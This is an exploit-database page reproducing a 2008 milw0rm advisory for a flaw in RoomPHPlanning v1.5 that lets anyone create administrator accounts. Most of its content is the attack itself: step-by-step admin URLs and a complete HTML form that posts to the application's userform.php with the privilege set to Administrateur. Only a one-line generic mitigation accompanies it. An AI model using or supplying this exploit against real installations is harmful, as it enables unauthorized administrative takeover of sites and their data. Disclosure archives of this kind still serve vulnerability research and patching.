header-logo
Suggest Exploit
vendor:
RoomPHPlanning
by:
Stack
3.3
CVSS
MEDIUM
Arbitrary Add Admin Users Vulnerability
264
CWE
Product Name: RoomPHPlanning
Affected Version From: v1.5
Affected Version To: v1.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

RoomPHPlanning v1.5 remote Arbitrary Add Admin Users Vulnerability

RoomPHPlanning is vulnerable to add user whit go to link in colon Nom write any name and in colon login whrite your adress email after password and the colon priviléges is adminstrator after click [enregistrer ]

Mitigation:

Ensure that the application is not vulnerable to arbitrary user creation and that only authorized users are allowed to create new users.
Source

Exploit-DB raw data:

###########################################
{+} RoomPHPlanning v1.5 remote Arbitrary Add Admin Users Vulnerability 
{+} Script download :http://www.beaussier.com/roomphplanning/telecharge.php
{+} Founded by : Stack
{+} Greetz : All friends & muslims HaCkeRs...
###########################################
DESCRIPTION:
RoomPHPlanning is vulnerable to add user whit go to link [see down]
in colon Nom write any name and in colon login whrite your adress email after password
and the colon priviléges is adminstrator after  click [enregistrer ]
Vulnerability:
  go to this link for add admin user
 1 : http://localhost/path/admin/userform.php
  go this link for login in
 2 : http://localhost/path/login.php
  after login in go to admin link
 3 : http://localhost/path/admin/
  for see all administrator & edit it
 4 : http://localhost/path/admin/?user=1
 after execute the command for add user or for login in the page is not changed
 it's necessary go to second link  1 2 3 4

EXPLOIT HTML :
-------------------------------------------------------------------------------------
<HTML>
<HEAD>
<TITLE>RoomPHPlanning add Admin user</TITLE>
<LINK REL="stylesheet" TYPE="text/css" HREF="style.css">
</HEAD>
<BODY>
<form action="http://site.com/path/admin/userform.php" method="POST">
<FORM ACTION="#" METHOD="POST">
<INPUT TYPE="HIDDEN" NAME="save" VALUE="1">
<TABLE WIDTH=98% BORDER=0 CELLPADDING=4 CELLSPACING=0>
<TR VALIGN=TOP>
<TD WIDTH=50%><P>Nom</P></TD>
<TD WIDTH=50%><INPUT TYPE=TEXT NAME='name' SIZE=40 VALUE=""></TD>
<TR VALIGN=TOP>
<TD WIDTH=50%><P>Login email</P></TD>
<TD WIDTH=50%><INPUT TYPE=TEXT NAME='login' SIZE=40 VALUE=""></TD>
<TR VALIGN=TOP>
<TD WIDTH=50%><P>Mot de passe</P></TD>
<TD WIDTH=50%><INPUT TYPE=TEXT NAME='pwd' SIZE=20></TD></TR>
</TR><TR VALIGN=TOP>
<TD WIDTH=50%><P>Privilèges</P></TD><TD WIDTH=50%><SELECT NAME="rank">
<OPTION VALUE="1">Administrateur</OPTION>
<OPTION VALUE="2">Utilisateur de base</OPTION>
<OPTION VALUE="3">Utilisateur normal</OPTION>
<OPTION VALUE="4">Anonyme</OPTION>
<OPTION VALUE="5">Super utilisateur</OPTION>
<OPTION VALUE="6">Gestionnaire</OPTION>
</SELECT>
 </TD>
</TR><TR><TD COLSPAN=2 WIDTH=100% VALIGN=TOP><CENTER><BR>
<INPUT TYPE="SUBMIT" VALUE="Enregistrer">
<INPUT TYPE="BUTTON" VALUE="Annuler"  ONCLICK="javascript:window.close();">
</TD></TR></TABLE></FORM></BODY>
</HTML>
-------------------------------------------------------------------------------------
 
GREETZ: http://real-hack.com
----------------------------------------------------------------------------- 

# milw0rm.com [2008-05-26]

Navigation

Suggest Exploit

Services By CQR